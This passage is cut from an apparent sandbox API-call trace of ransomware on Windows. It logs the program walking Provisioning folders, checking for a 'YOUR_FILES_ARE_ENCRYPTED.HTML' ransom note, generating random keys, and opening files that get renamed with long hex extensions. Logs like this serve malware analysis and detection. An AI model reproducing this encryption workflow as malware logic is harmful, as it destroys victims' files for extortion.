returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov" [0110.032] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\*" [0110.032] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaec1e986, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.033] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaec1e986, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="..", cAlternateFileName="")) returned 1 [0110.033] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime", cAlternateFileName="")) returned 1 [0110.033] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.033] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime") returned 97 [0110.033] GetProcessHeap () returned 0x600000 [0110.033] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.033] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime" [0110.033] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\*" [0110.033] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaec14d4b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f3e9c, dwReserved1=0x6f3de8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.034] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaec14d4b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f3e9c, dwReserved1=0x6f3de8, cFileName="..", cAlternateFileName="")) returned 1 [0110.034] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1397a49, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1397a49, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa13bdcbd, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xcdd, dwReserved0=0x6f3e9c, dwReserved1=0x6f3de8, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0110.034] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.034] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml") returned 113 [0110.034] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.034] lstrlenW (lpString=".provxml") returned 8 [0110.034] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.034] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa140a197, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa140a197, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa140a197, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xcdd, dwReserved0=0x6f3e9c, dwReserved1=0x6f3de8, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1 [0110.034] StrStrIW (lpFirst="Power_1.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.034] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml") returned 113 [0110.034] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0110.034] lstrlenW (lpString=".provxml") returned 8 [0110.034] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0110.034] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaec139c8, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaec139c8, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaec19c22, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f3e9c, dwReserved1=0x6f3de8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.034] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaec139c8, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaec139c8, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaec19c22, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f3e9c, dwReserved1=0x6f3de8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.034] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.034] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0110.034] GetProcessHeap () returned 0x600000 [0110.034] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.035] GetProcessHeap () returned 0x600000 [0110.035] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.035] GetProcessHeap () returned 0x600000 [0110.035] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.035] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa13e3f24, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa13e3f24, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa140a197, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x139, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0110.035] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.035] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml") returned 101 [0110.035] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0110.035] lstrlenW (lpString=".xml") returned 4 [0110.035] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0110.035] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0110.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0110.036] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=313) returned 1 [0110.036] CloseHandle (hObject=0x32c) returned 1 [0110.036] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaec1e986, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaec1e986, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaec22556, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.036] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaec1e986, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaec1e986, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaec22556, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.036] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.036] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0110.036] GetProcessHeap () returned 0x600000 [0110.036] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.037] GetProcessHeap () returned 0x600000 [0110.037] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.037] GetProcessHeap () returned 0x600000 [0110.037] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.038] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaec24c65, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaec24c65, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaec285bd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.038] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaec24c65, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaec24c65, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaec285bd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.038] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.038] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0110.038] GetProcessHeap () returned 0x600000 [0110.038] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.039] GetProcessHeap () returned 0x600000 [0110.039] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.039] GetProcessHeap () returned 0x600000 [0110.039] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.039] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaec70bdd, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaec70bdd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", cAlternateFileName="{3742E~1")) returned 1 [0110.039] StrStrIW (lpFirst="{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.039] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}") returned 84 [0110.039] GetProcessHeap () returned 0x600000 [0110.039] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.040] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}" [0110.040] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*" [0110.040] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaec70bdd, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaec8a93b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0110.040] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaec70bdd, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaec8a93b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0110.040] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2363c60, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa2363c60, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xaec751b2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x1988, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="customizations.xml.138E6CBCF435FDDCCD4FCFABFD8FA7F8200E39554849E0AACA98FBF772426A02", cAlternateFileName="CUSTOM~1.138")) returned 1 [0110.040] StrStrIW (lpFirst="customizations.xml.138E6CBCF435FDDCCD4FCFABFD8FA7F8200E39554849E0AACA98FBF772426A02", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.041] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml.138E6CBCF435FDDCCD4FCFABFD8FA7F8200E39554849E0AACA98FBF772426A02") returned 168 [0110.041] PathFindExtensionW (pszPath="customizations.xml.138E6CBCF435FDDCCD4FCFABFD8FA7F8200E39554849E0AACA98FBF772426A02") returned=".138E6CBCF435FDDCCD4FCFABFD8FA7F8200E39554849E0AACA98FBF772426A02" [0110.041] lstrlenW (lpString=".138E6CBCF435FDDCCD4FCFABFD8FA7F8200E39554849E0AACA98FBF772426A02") returned 65 [0110.041] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa21c0195, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa21c0195, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa21c0195, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0110.041] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.041] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml") returned 104 [0110.041] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.041] lstrlenW (lpString=".xml") returned 4 [0110.041] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.041] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0110.041] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=271) returned 1 [0110.041] CloseHandle (hObject=0x30c) returned 1 [0110.041] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaec78149, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaec78149, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="Prov", cAlternateFileName="")) returned 1 [0110.041] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.041] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov") returned 89 [0110.041] GetProcessHeap () returned 0x600000 [0110.041] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.042] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov" [0110.042] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\*" [0110.042] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaec78149, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaec8447a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.043] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaec78149, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaec8447a, 